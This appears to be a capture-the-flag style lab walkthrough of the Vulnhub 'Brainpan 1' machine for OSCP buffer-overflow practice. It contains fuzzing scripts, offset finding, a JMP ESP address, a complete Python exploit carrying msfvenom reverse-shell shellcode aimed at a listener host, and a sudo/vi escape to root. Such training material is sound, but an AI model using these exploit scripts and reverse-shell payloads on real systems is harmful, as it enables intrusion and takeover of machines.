Brainpan 1

Vulnhub virtual machine; OSCP Buffer-Overflow prep. “Where we’re going we don’t need roads”. This box is a perfect test of skills in regards to buffer-overflows and you will work on crafting an overflow that leads to a reverse shell. The escalation of box stems from a pivot via a manual.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Discover VM on network

1
netdiscover -r 192.168.56.0/24

target: 192.168.56.110

Enumeration

Nmap Scan

1
nmap -sV -sC -oA nmap/brainpan 192.168.56.110

We have identified several interesting ports 9999 - unknow service but has this “WELCOME TO BRAINPAN” 10000 - SimpleHTTPServer with some type of base64nc

navigating to port 10000 - which lead to this image

inspecting source:

Nothing much left to look at.

Connecting to port 9999

1
nc 192.168.56.110 9999

we have a password field in which we can try to brute force. Nevermind it just connection refused after several attempts.

webmin is an interesting user possibly

Continuing enumeration with dirbuster

Navigating to /bin

well an brainpan.exe discovered - download locally to investigate.

1
file brainpan

PE32 executable - Looks like we’ll be doing some reverse engineering.

Reverse Engineering

Opening file with wine

1
wine brainpan.exe

hmm port 9999 let’s try and connect to localhost on 9999

1
nc 127.0.0.1 9999

we recieved a callback to the brainpan.exe on port 9999

attemping a password of password

the word password looks to have pushed 9 bytes to the buffer.

Load brainpan.exe into ollydbg

Start twice to run

secondary window (popup)

application is running correctly and awaiting connections to port 9999.

Goal: is to gain control of ESP & EIP to then JMP ESP shellcode to a reverse shell.

vid- fuzz.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/python

import socket

buffer=["A"]
counter=100
while len(buffer) <= 10:
  buffer.append("A"*counter)
  counter=counter+100 #increment by 100

try:
  for string in buffer:
    print "Fuzzing App with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('127.0.0.1', 9999))
    s.recv(1024)
    s.send(string + '\r\n')
    s.close()

execpt:
  print "Could not connect to application, you might of crashed it"

create bfuzz.py (fuzzing application) - launch against application

1
2
3
4
5
6
7
8
9
10
#!/bin/usr/python

import socket
for i in range(30):
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect (('127.0.0.1',9999))
 payload = int(i)*("A"*100)
 s.send(payload+"\r\n")
 print "[*] Sending evil buffer with " + str(len(str(payload))) + " A's\r\n"
 s.close()

brainpan.exe response:

and finally a crash of program around 600 bytes.

create pattern with metasploit

1
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

output:

1
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

add to buffer skeleton file.

Buffer Skeleton File (buff-skel.py):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
execpt:
  print "Could not connect to brainpan service"

add pattern_create string to buff-skel.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

now the buffer is 600 bytes of non repeating code.

execute buff-skel.py in an attempt to find exactly where application crashes.

verifying data got sent to application via olly

Application is confirm killed via Access violation when execute [35724134] -

EIP = 35724134 (highlighted in registers)

We need to find this exact offset of EIP with pattern_offset

1
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134

Offset = 524 - the exact number of bytes required to be sent to application to cause the crash

Adjust the buff-skel.py to change to exact 524 “A”s to send to brainpan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*524 + 'B'*4 + 'C'*(600-524-4) # adding number of exact bytes required to crash and B's to fill up the EIP with 41414141 and C to fill up the rest of the space of the 600 bytes.

# prior 600 bytes pattern 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

we are going to want to try to fill the EIP value with something so we can determine if we’ve taken it over.

Restart application in OllyDbg

1
1
Debug > restart > (yes) > click start blue for "running"

crash application with buff-skel.py

Application crashed.

OllyDgb

Now shows that we have replaced the registers:

EBP: 41414141 = A’s EIP: 42424242 = B’s

Follow ESP dump

1
right click on ESP > follow in dump

brings us to the excution of the C’s and this will be the area where our generated shellcode will be placed.

shellcode is normally 300bytes on average.

Restart application in OllyDbg

1
1
Debug > restart > (yes) > click start blue for "running"

Currently we have about 60bytes of space to work with and so we need to attempt to add more space to the C area by changing the 600 to 1400.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*524 + 'B'*4 + 'C'*(1400-524-4) # adding the 1400 arbitrary number

# adding number of exact bytes required to crash and B's to fill up the EIP with 41414141 and C to fill up the rest of the space of the 600 bytes.

# prior 600 bytes pattern 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

Run buff-skel.py

significant number of C’s and space available for the shellcode.

Keep in mind bad characters for Buffer Overflows https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/

great write up available by Georgia Weidman #hailGeorgia

Testing For Bad Characters

add badchars to buff-skel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = 'A'*524 + 'B'*4 + badchars # adding badchars to C area

# adding the 1400 arbitrary number

# adding number of exact bytes required to crash and B's to fill up the EIP with 41414141 and C to fill up the rest of the space of the 600 bytes.

# prior 600 bytes pattern 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

run buff-skel for badchars

hex dump shows exactly after the A’s and B’s the badchars sent. If there is a gap in the sequence we can see what exact char is bad.

Note: if shell code doesn’t work its probably a badchar which is possibly stopping you.

restart ollydgb

Finding the JMP ESP

locating the jmp esp in main

1
right click > search for > all commands > jmp esp

Results:

JMP ESP = 311712f3 - with this we know we can have our shellcode execute from here.

adjust buff-skel.py to add the JMP ESP address

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*524 + "\xF3\x12\x17\x31" + 'C'*(1400-524-4)  # deleted badchars and add JMP ESP address as B in "LITTLE INDIAN" format (backwards/reversed). added back the 1400 C space.

# adding badchars to C area

# adding the 1400 arbitrary number

# adding number of exact bytes required to crash and B's to fill up the EIP with 41414141 and C to fill up the rest of the space of the 600 bytes.

# prior 600 bytes pattern 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999))
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

before executing add breakpoint to ollydgb for the JMP ESP

1
on jmp esp right click > Breakpoint > Toggle

which will not stop at this point when application is ran.

Execute buff-skel.py - hit breakpoint

and directs the jmp right the C’s where our shell code will exist.

Creating Shellcode Payload

reverse shellcode via msfvenom

1
msfvenom -p linux/x86/meterpreter/reverse_tcp -b \x00 LHOST=192.168.56.102 LPORT=9000 -f python

-b = for badchar (we know \x00 is a no-go)

add shellcode to buff-skel.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buf =  ""
buf += "\xbd\x7f\xac\x28\xec\xda\xcf\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x1f\x83\xc0\x04\x31\x68\x11\x03\x68\x11\xe2"
buf += "\x8a\xc6\x22\xb2\x45\xcc\xc4\xa9\xf6\xb1\x79\x44\xfa"
buf += "\x85\x18\x11\x1b\x28\x64\xb6\x80\xdb\xa5\x11\x0e\x7a"
buf += "\x4e\x60\x6e\xa1\xa6\xed\x8f\xcf\xd0\xb5\x1f\x41\x4a"
buf += "\xcf\x7e\x22\xb9\x4f\x05\x65\x38\x49\x4b\x12\x86\x01"
buf += "\xf1\xda\xf8\xd1\xad\xb0\xf8\xbb\x48\xcc\x1a\x0a\x9b"
buf += "\x03\x5c\xe8\xdb\xe5\xe0\x18\xfc\xa7\x1c\x66\x02\xd8"
buf += "\x22\x98\x8b\x3b\xe3\x73\x87\x7a\x07\x8f\x27\x01\x05"
buf += "\x10\xc2\x3a\xed\x01\x97\x33\xef\xbb\x91\x48\x40\xb8"
buf += "\x10\xd0\x25\x7f\xd2\xd3\xda\x61\x9a\xd5\x24\x62\xda"
buf += "\x6e\x25\x62\xda\x90\xeb\xe2"

buffer = 'A'*524 + "\xF3\x12\x17\x31" +'\x90'*20 + buf # added small kop sled infront of buffer to give a bit a room before the shell code and added buf.  

# deleted badchars and add JMP ESP address as B in "LITTLE INDIAN" format (backwards/reversed). added back the 1400 C space.

# adding badchars to C area

# adding the 1400 arbitrary number

# adding number of exact bytes required to crash and B's to fill up the EIP with 41414141 and C to fill up the rest of the space of the 600 bytes.

# prior 600 bytes pattern 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9' 
# 'A' * 600 #intial 600 bytes we discovered earlier

try:
  print "\nSending malicious buffer..."
  s.connect(('127.0.0.1', 9999)) # changed to actual target 
  data = s.recv(1024)
  s.send(buffer + '\r\n')
  print "\nOverflowed"
except:
  print "Could not connect to brainpan service"

Setup NC Listener

1
nc -lvnp 9000

In some cases the nc listener just doesn’t function property and thats when you need to switch to metasploits.

Setup Metasploit Listener Note: for OSCP exam you are allowed to use the metasploit multi/handler listener as much as you want.

launch metasploit (fastest way)

1
msfdb run

1
use exploit/multi/handler

1
set PAYLOAD linux/x86/shell/reverse_tcp

1
set LPORT 9000

1
set LHOST 192.168.56.102

1
exploit

Priv-Esc

connection made after buffer-overflow

Upgrade to TTY

1
python -c 'import pty;pty.spawn("/bin/bash")'

quick check of sudo abilities

1
sudo -l

application anasi_util is able to be ran as root

1
sudo /home/bin/anasi_util

looks to be a manual [command] which looks like a good way to escalate.

Escalation via vi:

1
sudo /home/bin/anasi_util manual vi

Root

enter escape sequenence !bash

Gimme the loot!

1
cd /root && cat b.txt

Bring me the root!

-exec